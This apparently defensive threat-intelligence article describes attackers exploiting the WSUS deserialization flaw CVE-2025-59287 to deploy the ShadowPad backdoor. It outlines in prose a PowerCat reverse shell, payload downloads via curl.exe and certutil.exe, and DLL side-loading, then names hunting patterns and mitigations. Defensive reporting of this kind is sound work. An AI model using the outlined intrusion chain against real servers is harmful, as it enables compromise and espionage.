Threat actors currently abuse 𝗖𝗩𝗘-𝟮𝟬𝟮𝟱-𝟱𝟵𝟮𝟴𝟳, a critical remote code execution flaw in Windows Server Update Services (WSUS), to deliver and run the 𝗦𝗵𝗮𝗱𝗼𝘄𝗣𝗮𝗱 backdoor with full SYSTEM privileges on Windows servers. Instead of going after exposed RDP or VPN services directly, they move through a trusted update channel that many organizations still treat as “safe by default.”
In the cases analyzed by incident responders, adversaries first gain access to WSUS, then pivot from that high-privileged foothold to install ShadowPad across the environment. Consequently, the compromise does not look like a typical phishing-driven intrusion; it looks like “business as usual” patching until defenders correlate the activity with unusual tooling and outbound connections.
𝗛𝗼𝘄 𝗮𝘁𝘁𝗮𝗰𝗸𝗲𝗿𝘀 𝗴𝗲𝘁 𝗳𝗿𝗼𝗺 𝗪𝗦𝗨𝗦 𝘁𝗼 𝗮 𝗦𝗬𝗦𝗧𝗘𝗠 𝘀𝗵𝗲𝗹𝗹
In this campaign, the operators 𝗱𝗼𝗻’𝘁 rely on exotic custom loaders at the start. Instead, they abuse the WSUS deserialization flaw to execute arbitrary code on the server, then lean on well-known tools to complete the compromise chain. According to public technical reporting, they specifically target Windows servers with WSUS enabled and reachable, then exploit CVE-2025-59287 to obtain code execution in the WSUS context.
After they establish that initial foothold, they 𝗶𝗺𝗽𝗼𝗿𝘁 a PowerShell-based Netcat equivalent, usually 𝗣𝗼𝘄𝗲𝗿𝗖𝗮𝘁, to obtain an interactive 𝗦𝗬𝗦𝗧𝗘𝗠 shell. The typical pattern involves downloading a PowerCat script from a remote source and then launching a reverse shell toward attacker-controlled infrastructure. This step turns WSUS from a simple update distribution endpoint into a live command-and-control pivot.
From there, the operators download ShadowPad components using 𝗰𝘂𝗿𝗹.𝗲𝘅𝗲 and 𝗰𝗲𝗿𝘁𝘂𝘁𝗶𝗹.𝗲𝘅𝗲, both native Windows tools that often slip under the radar because administrators also use them legitimately. The malware then arrives in several staged files, which the attackers decode and execute directly on the server.
𝗪𝗵𝗮𝘁 𝗺𝗮𝗸𝗲𝘀 𝗖𝗩𝗘-𝟮𝟬𝟮𝟱-𝟱𝟵𝟮𝟴𝟳 𝘀𝗼 𝘀𝗲𝗿𝗶𝗼𝘂𝘀
The vulnerability itself stems from 𝗱𝗲𝘀𝗲𝗿𝗶𝗮𝗹𝗶𝘇𝗮𝘁𝗶𝗼𝗻 𝗼𝗳 𝘂𝗻𝘁𝗿𝘂𝘀𝘁𝗲𝗱 𝗱𝗮𝘁𝗮 inside WSUS. In practice, the service processes specially crafted serialized objects from an attacker-controlled request, then reconstructs those objects without sufficient validation. As a result, the attacker can force the server to execute arbitrary code. This class of issue fits squarely into the broader insecure deserialization problem space that OWASP and others have warned about for years.
Because WSUS often runs with 𝗦𝗬𝗦𝗧𝗘𝗠 privileges and because organizations frequently centralize update distribution on a small number of critical servers, exploitation immediately raises the stakes. An unauthenticated attacker who reaches the vulnerable WSUS endpoint can 𝗺𝗼𝘃𝗲 𝗶𝗻𝘀𝘁𝗮𝗻𝘁𝗹𝘆 from “outside the network” to “inside with SYSTEM rights,” which compresses the usual kill chain into just a few requests.
𝗦𝗵𝗮𝗱𝗼𝘄𝗣𝗮𝗱’𝘀 𝗿𝗼𝗹𝗲 𝗶𝗻 𝗖𝗵𝗶𝗻𝗲𝘀𝗲-𝗹𝗶𝗻𝗸𝗲𝗱 𝗼𝗽𝗲𝗿𝗮𝘁𝗶𝗼𝗻𝘀
ShadowPad itself has a long and documented history in Chinese state-aligned espionage campaigns. Threat intelligence teams describe it as a 𝗺𝗼𝗱𝘂𝗹𝗮𝗿, 𝗽𝗹𝘂𝗴𝗶𝗻-𝗯𝗮𝘀𝗲𝗱 backdoor that supports file operations, credential theft, lateral movement, and long-term command-and-control. Since its emergence in the mid-2010s, multiple APT groups have adopted ShadowPad as a shared capability rather than a one-off implant.
In this WSUS-focused campaign, once ShadowPad lands on the server, it does not simply sit as a static file. Instead, it loads through 𝗗𝗟𝗟 𝘀𝗶𝗱𝗲-𝗹𝗼𝗮𝗱𝗶𝗻𝗴. The attackers place a malicious DLL alongside a legitimate executable such as 𝗘𝗧𝗗𝗖𝘁𝗿𝗹𝗛𝗲𝗹𝗽𝗲𝗿.𝗲𝘅𝗲. When Windows runs that binary, it automatically loads the attacker-controlled DLL, which then injects the ShadowPad payload into memory. This technique aligns with known DLL side-loading patterns tracked in frameworks like MITRE ATT&CK.
Because ShadowPad operates largely in memory and because it uses encrypted configuration data, defenders often struggle to identify it through simple file-based signatures. Instead, teams usually need to combine process behavior, network telemetry, and registry analysis to detect the presence of its core modules and plugins.
𝗔𝘁𝘁𝗮𝗰𝗸 𝘁𝗲𝗹𝗲𝗺𝗲𝘁𝗿𝘆: 𝗳𝗿𝗼𝗺 𝗪𝗦𝗨𝗦 𝗲𝗻𝗱𝗽𝗼𝗶𝗻𝘁 𝘁𝗼 𝗦𝗵𝗮𝗱𝗼𝘄𝗣𝗮𝗱 𝗖𝟮
Telemetry from observed incidents shows a consistent pattern. First, the attacker hits a publicly exposed WSUS instance and runs the deserialization exploit. Next, they use PowerShell to pull down PowerCat, then establish a reverse shell toward their infrastructure. After that, they run 𝗰𝘂𝗿𝗹.𝗲𝘅𝗲 and 𝗰𝗲𝗿𝘁𝘂𝘁𝗶𝗹.𝗲𝘅𝗲 to download ShadowPad components from an external IP address before decoding intermediate files into the final payload.
Once the malware initializes, it loads a 𝗰𝗼𝗿𝗲 𝗺𝗼𝗱𝘂𝗹𝗲 that acts as an orchestrator for additional plugins. Those plugins provide capabilities such as command execution, data exfiltration, and lateral movement. Because the operators control which modules they deploy, the same codebase can support espionage-focused campaigns in one environment and more disruptive or monetization-driven operations in another.
Investigators also observed use of legitimate forensic tools like 𝗩𝗲𝗹𝗼𝗰𝗶𝗿𝗮𝗽𝘁𝗼𝗿 in some exploitation chains, either for reconnaissance or as part of a hands-on attack where the adversary repurposes blue-team utilities for their own situational awareness. That behavior further complicates detection efforts because the tool appears in many environments as a normal DFIR component.
𝗪𝗵𝘆 𝗪𝗦𝗨𝗦 𝗯𝗲𝗰𝗼𝗺𝗲𝘀 𝘀𝘂𝗰𝗵 𝗮 𝗵𝗶𝗴𝗵-𝘃𝗮𝗹𝘂𝗲 𝘁𝗮𝗿𝗴𝗲𝘁
From a defender’s point of view, WSUS often sits in a “trusted infrastructure” category. Teams usually prioritize hardening internet-facing web applications, VPN concentrators, and identity providers, while WSUS quietly distributes updates from inside the network. Because of that, logging and monitoring on WSUS servers frequently lags behind other critical assets.
However, the service holds several properties that make it ideal for attackers. It usually runs with 𝗵𝗶𝗴𝗵 𝗽𝗿𝗶𝘃𝗶𝗹𝗲𝗴𝗲𝘀, it brokers trust between Microsoft and the organization’s endpoints, and it touches a large percentage of domain-joined systems. Therefore, once an APT gains control of WSUS, that actor gains both a distribution channel and a reconnaissance hub. In the ShadowPad scenario, the attackers use WSUS as a reliable pivot into Windows servers that administrators already expect to receive traffic from the update service.
𝗣𝗿𝗮𝗰𝘁𝗶𝗰𝗮𝗹 𝗱𝗲𝘁𝗲𝗰𝘁𝗶𝗼𝗻 𝗶𝗱𝗲𝗮𝘀 𝗳𝗼𝗿 𝗦𝗵𝗮𝗱𝗼𝘄𝗣𝗮𝗱 𝗮𝗻𝗱 𝗖𝗩𝗘-𝟮𝟬𝟮𝟱-𝟱𝟵𝟮𝟴𝟳
Security teams who suspect exposure to CVE-2025-59287 or to ShadowPad should move beyond simple patch checks. They should also 𝗿𝗲𝘃𝗶𝗲𝘄 𝗹𝗼𝗴𝘀 for PowerShell sessions that download remote scripts, especially any commands that reference PowerCat, raw GitHub URLs, or one-line invoke expressions. In addition, they should inspect process creation logs for abnormal invocations of curl.exe and certutil.exe on WSUS hosts, particularly where those utilities connect to unrecognized IP addresses or ports.
Beyond that, defenders should baseline which binaries normally run on their WSUS servers, then 𝗵𝘂𝗻𝘁 for unusual DLL loading patterns that may indicate side-loading behavior. Suspicious pairs of legitimate executables and unexpected DLLs, especially in paths that host vendor-provided tools, deserve close scrutiny. Threat intelligence and ATT&CK references for DLL side-loading can help analysts map observed events to known techniques.
Finally, organizations should examine their use of deserialization across internal services more broadly. Whenever a critical component ingests serialized objects from network clients, it should treat that data as hostile, validate it rigorously, and avoid dangerous serializers where possible. The WSUS case underlines how quickly a deserialization issue can evolve from a theoretical code-execution bug into a fully weaponized intrusion vector that deploys advanced implants.
𝗦𝘁𝗿𝗮𝘁𝗲𝗴𝗶𝗰 𝗺𝗶𝘁𝗶𝗴𝗮𝘁𝗶𝗼𝗻: 𝗽𝗮𝘁𝗰𝗵𝗶𝗻𝗴, 𝘀𝗲𝗴𝗺𝗲𝗻𝘁𝗮𝘁𝗶𝗼𝗻, 𝗮𝗻𝗱 𝘃𝗶𝘀𝗶𝗯𝗶𝗹𝗶𝘁𝘆
Even though Microsoft has already issued patches for CVE-2025-59287, many organizations still run vulnerable WSUS instances. Therefore, patch verification must sit at the top of the response plan. Teams should confirm that both the original and any out-of-band updates have reached all WSUS servers, including lab or test environments that quietly sync from production.
At the same time, security architects should 𝗿𝗲𝗲𝘃𝗮𝗹𝘂𝗮𝘁𝗲 WSUS network exposure. Whenever possible, they should restrict access to management networks, limit inbound connectivity on WSUS ports, and avoid exposing WSUS directly to the public internet. Where business constraints force broader exposure, they should introduce additional inspection and authentication layers in front of the service so that anonymous requests cannot reach the deserialization surface.
To round out the mitigation strategy, defenders should strengthen endpoint visibility. Tools like Velociraptor and other DFIR platforms can provide rapid collection of process, registry, and network data across large fleets, which enables targeted hunts for ShadowPad indicators or deserialization exploit traces. However, teams must configure those tools carefully so that adversaries cannot repurpose them if they compromise their control plane.
𝗙𝗔𝗤𝘀
𝗤: 𝗗𝗼𝗲𝘀 𝗦𝗵𝗮𝗱𝗼𝘄𝗣𝗮𝗱 𝗼𝗻𝗹𝘆 𝘁𝗮𝗿𝗴𝗲𝘁 𝗪𝗦𝗨𝗦?
ShadowPad does not limit itself to WSUS. The backdoor appears in campaigns that abuse a variety of initial access vectors, including supply-chain compromises and other server-side vulnerabilities.
𝗤: 𝗜𝗳 𝗜 𝗵𝗮𝘃𝗲 𝗽𝗮𝘁𝗰𝗵𝗲𝗱 𝗪𝗦𝗨𝗦, 𝗰𝗮𝗻 𝗜 𝗮𝘀𝘀𝘂𝗺𝗲 𝗜’𝗺 𝘀𝗮𝗳𝗲?
Patch deployment significantly reduces risk, yet it does not guarantee that attackers never exploited the bug earlier. Teams should still run targeted threat-hunting queries on WSUS servers and surrounding infrastructure, looking for the PowerCat activity, odd curl and certutil usage.
𝗤: 𝗪𝗵𝗮𝘁 𝗶𝗳 𝗺𝘆 𝗼𝗿𝗴𝗮𝗻𝗶𝘇𝗮𝘁𝗶𝗼𝗻 𝗰𝗮𝗻’𝘁 𝗽𝗮𝘁𝗰𝗵 𝗪𝗦𝗨𝗦 𝗶𝗺𝗺𝗲𝗱𝗶𝗮𝘁𝗲𝗹𝘆?
In cases where patching lags behind, organizations should harden network access, introduce strict ACLs around WSUS, and implement high-fidelity monitoring on the vulnerable endpoints. Compensating controls never fully replace fixes.
